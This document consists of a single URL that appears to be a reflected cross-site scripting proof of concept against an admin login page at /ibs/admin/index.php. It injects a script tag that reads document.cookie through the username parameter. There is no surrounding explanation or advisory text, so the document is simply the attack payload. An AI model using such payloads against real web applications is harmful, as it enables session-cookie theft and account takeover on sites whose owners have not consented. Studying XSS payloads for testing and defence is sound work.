http://www.example.com/ibs/admin/index.php?username=<script>alert(document.cookie)</script>&password=a&B1=Submit